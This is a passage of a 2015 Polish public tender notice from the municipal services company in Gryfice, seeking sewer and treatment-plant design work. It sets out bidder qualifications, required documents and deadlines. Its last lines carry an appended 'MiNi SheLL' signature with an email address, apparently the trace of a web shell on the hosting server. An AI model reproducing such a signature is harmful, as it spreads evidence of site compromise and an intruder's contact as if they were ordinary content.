     2. terminem wszczęcia postępowania o udzielenie zamówienia na roboty budowlane realizowane 
         na podstawie tej dokumentacji.
     Każda z przecen wszystkich kosztorysów zostanie przeprowadzona po uprzednim zgłoszeniu 
     Wykonawcy potrzeby wykonania danej przeceny, w terminie 14 dni od daty otrzymania                 
     przez Wykonawcę pisemnego zgłoszenia Zamawiającego.      
F. Sporządzenie przedmiarów robót dla branż objętych poszczególnymi opracowaniami 
    projektowymi w rozumieniu definicji z Rozporządzenia Ministra Infrastruktury z dnia 2 września 
    2004 r. (Dz. U. nr 202, poz. 2072 ze zm.).
G. Udostępnienie Zamawiającemu instrukcji eksploatacji przepompowni ścieków.
Poza opracowaniami merytorycznymi do przedmiotu zamówienia należy sporządzenie, złożenie               do odpowiednich instytucji kompletnych wniosków o wydanie i odbiór decyzji:
a) o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia;
b) o ustaleniu lokalizacji inwestycji celu publicznego;
c) o udzieleniu pozwolenia na budowę. 
Wszelkie opracowania analityczne, projektowe, kosztowe i specyfikacje jakościowe, objęte przedmiotem zamówienia, powinny być wykonane w zgodności z przepisami prawa,                                  a w szczególności z:
- ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tekst jedn. Dz. U. z 2013 r. 
  poz. 1232 ze zm.),
- ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2013 r. poz. 1409 ze zm.),
- ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2013 r. 
   poz. 907 ze zm.),
- odnośnymi przepisami wykonawczymi do tych ustaw.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca zobowiązany jest wnieść wadium w wysokości 1.000,00 PLN (słownie: jeden tysiąc 
    złotych 00/100) przed terminem składania ofert.
2. Wadium może być wniesione w:
1)	pieniądzu;
2)	poręczeniach bankowych, lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,                     
       z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia                 
       9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r.  
       Nr 42, poz. 275 z późn. zm.).
3. Szczegółowe informacje na temat warunków wniesienia wadium zawarte są w rozdziale VIII 
    SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności  jest   krótszy  -  w  tym   okresie,   zrealizował co najmniej jedną  usługę polegającą na: 
1. opracowaniu koncepcji sieci kanalizacji sanitarnej z oczyszczalnią lub przebudową istniejącej oczyszczalni, lub: 
2. zaprojektowaniu i uzyskaniu pozwolenia na budowę, przebudowę lub remont oczyszczalni ścieków wraz z kanalizacją, lub:
3. opracowaniu koncepcji sieci kanalizacji sanitarnej z oczyszczalnią lub przebudową istniejącej oczyszczalni oraz zaprojektowaniu na podstawie własnej lub innej koncepcji i uzyskaniu pozwolenia na budowę, przebudowę lub remont oczyszczalni ścieków wraz z kanalizacją.               Ww. usługi mogły być realizowane w ramach jednej umowy lub kilku umów o wartości                      co najmniej 20.000,00 zł brutto każda.                                                                                          
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający                  nie wymaga, aby każdy z Wykonawców wykazał spełnianie w/w warunku oddzielnie.                           Do uznania spełniania warunku, wystarczające będzie, jak tylko jeden Wykonawca wykaże się wymaganą wiedzą i doświadczeniem.
W przypadku, gdy żaden z Wykonawców nie posiada wymaganej wiedzy i doświadczenia, może on polegać na wiedzy i doświadczeniu innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp. Pamiętać należy jednak, że zasób wiedzy i doświadczenia jest nierozerwalnie związany z podmiotem go udostępniającym niemożliwym do samodzielnego obrotu                               bez zaangażowania się tego podmiotu w realizację zamówienia. Oznacza to że nie można tymi zasobami podzielić się z innym wykonawcą tylko w sferze abstrakcyjnego zobowiązania                      bez jego zastosowania w praktyce. Bez zagwarantowania stosownego zaangażowania podmiotu udostępniającego swój zasób wiedzy i doświadczenia przy realizacji zamówienia możliwość dysponowania potencjałem przez wykonawcę zamawiający uzna za iluzoryczną.                                W niniejszym postępowaniu pod pojęciem wiedzy i doświadczenia należy rozumieć wykonanie,             a nie tylko wykazanie jednej usługi. Z tych względów nie jest dopuszczalne sumowanie przez Wykonawcę, w celu osiągnięcia wymaganego poziomu wiedzy i doświadczenia, świadczeń                   w zakresie usług projektowych obejmujących przedmiot zamówienia, nie posiadających wymaganej w niniejszym postępowaniu wiedzy i doświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają uprawnienia projektowe określone przepisami Prawa Budowlanego, w następujących specjalnościach:
a) konstrukcyjno-budowlanej bez ograniczeń;
b) instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych o kanalizacyjnych                                  
    bez ograniczeń; 
c) instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych                          
    bez ograniczeń;
d) inżynieryjnej drogowej bez ograniczeń.
Uwaga:
Projektanci powinni posiadać uprawnienia budowlane bez ograniczeń zgodnie z ustawą z dnia                7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. poz. 1278) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane za zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tekst jedn.            Dz. U. Nr 63, poz. 394 z późn. zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W celu umożliwienia dokonania oceny oferty w kryterium dorobek wykonawcy, opisanym                 
    w rozdziale XIII SIWZ, Wykonawca winien złożyć wypełnioną  Kartę oceny oferty wykonawcy 
    w kryterium dorobek wykonawcy, sporządzoną z wykorzystaniem wzoru stanowiącego 
    załącznik nr 7 do SIWZ.
2. Zgodnie z zaleceniem w rozdziale VIII ust. 5 pkt 1) i 2) SIWZ, dowód wniesienia wadium. 
3. W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów 
     przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy 
     do oferty dołączyć stosowne pełnomocnictwo w oryginale lub kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Dorobek wykonawcy - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- w zakresie zmiany wynagrodzenia:
a) jeżeli nastąpi urzędowa zmiana podatku VAT od towarów i usług;
- w zakresie zmiany terminu wykonania umowy:
b) jeżeli wystąpią opóźnienia wynikające z dłuższego niż niezwłoczny w rozumieniu KPA, czas trwania procedur administracyjnych i uzgodnieniowych, których przebieg jest niezależny                          od Wykonawcy i Zamawiającego, i których wydłużenie się może być spowodowane opieszałością instytucji, organów lub niekorzystnym wpływem osób trzecich (np. protesty), a Wykonawca wykaże Zamawiającemu na piśmie, że wystąpienie tych zdarzeń uzasadnia zmianę terminu wykonania umowy.
c) jeżeli wystąpi potrzeba wykonania dodatkowych opracowań nakazanych decyzjami określonych instytucji i organów administracyjnych, nie przewidzianych w umowie przez Wykonawcę                        i Zamawiającego, a koniecznych do uzyskania pozwolenia na budowę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.zgk.gryfice.eu/zamowienia/pokaz/59.dhtml<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Usług Komunalnych                    w Gryficach, ul. Zielona 5, 72-300 Gryfice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.09.2015 godzina 10:00, miejsce: Zakład Usług Komunalnych w Gryficach, ul. Zielona 5, budynek Administracji, pok. nr 4 
            (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com